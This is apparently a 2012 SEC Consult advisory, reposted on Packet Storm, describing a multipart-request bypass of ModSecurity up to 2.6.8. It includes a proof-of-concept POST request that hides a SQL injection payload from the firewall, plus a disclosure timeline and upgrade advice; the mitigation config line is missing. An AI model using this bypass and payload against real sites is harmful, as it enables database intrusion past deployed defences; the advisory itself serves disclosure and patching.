ModSecurity 2.6.8 Bypass

Type packetstorm
Reporter Bernhard Mueller
Modified 2012-10-17T00:00:00


                                            `SEC Consult Vulnerability Lab Security Advisory < 20121017-0 >  
title: ModSecurity multipart/invalid part ruleset bypass  
product: ModSecurity  
vulnerable version: <= 2.6.8  
fixed version: 2.7.0  
CVE number: -  
impact: Depends what you use it for  
found: 2012-10-12  
by: Bernhard Mueller  
SEC Consult Vulnerability Lab  
Vendor/product description:  
ModSecurity for Apache is a web server plug-in for the Apache web server  
platform. This is the original, most mature and deployed ModSecurity module.  
This module is maintained by the Trustwave SpiderLabs Research Team.  
Vulnerability overview/description:  
Validation of POST parameters can be bypassed on Apache/PHP installations by  
sending specially formed multipart requests. A POST parameter's content can be  
hidden from ModSecurity by prepending an invalid part. This first part  
contains only a Content-Disposition header and has an additional carriage  
return inserted at the end of the line ([\r\r\n]). This is followed by a  
boundary in the next line and another Content-Disposition header with a  
filename. The request content looks like this (newlines are all \r\n except in  
line 2).  
Content-Disposition: form-data; name="id"[\r][\r][\n]  
Content-Disposition: form-data; name="lol"; filename="x"  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
ModSecurity skips what it believes to be an invalid first part and proceeds to  
parse the second part. This part is treated as a file and not checked against  
the ruleset.  
PHP however treats the whole thing as a single part and processes only the  
first Content-Disposition header, ignoring the second one. In the opinion of  
PHP this request contains a POST parameter with the name specified in the  
first header.  
Proof of concept:  
<? echo $POST[xxx] ?>  
POST request:  
POST /wut.php HTTP/1.1  
Content-Type: multipart/form-data; boundary=A  
Content-Length: 161  
Content-Disposition: form-data; name="xxx"[\r][\r][\n]  
Content-Disposition: form-data; name="yyy"; filename="z"  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
(any change in the header should produce a 403)  
Vulnerable / tested versions:  
This works with ModSecurity up to version 2.6.8.  
Vendor contact timeline:  
2012-10-11: Contacted ModSecurity  
2012-10-15: ModSecurity guys fixed it  
2012-10-16: New ModSecurity release 2.7.0  
2012-10-17: Public release of advisory  
To mitigate this bypass method, upgrade to ModSecurity 2.7.0 and make sure  
that the MULTIPART_INVALID_PART flag is set in the multipart strict validation  
rule. Add the line:  
to the SecRule MULTIPART_STRICT_ERROR in your ModSecurity configuration file.  
Download is available at:  
Advisory URL:  
The SEC Consult Group  
Office Vienna  
Mooslackengasse 17  
A-1190 Vienna  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
Office Singapore  
4 Battery Road  
#25-01 Bank of China Building  
Singapore (049908)  
Mail: office at sec-consult dot sg  
Check out our blog at:  
And this thing here:  
EOF B. Mueller / October 2012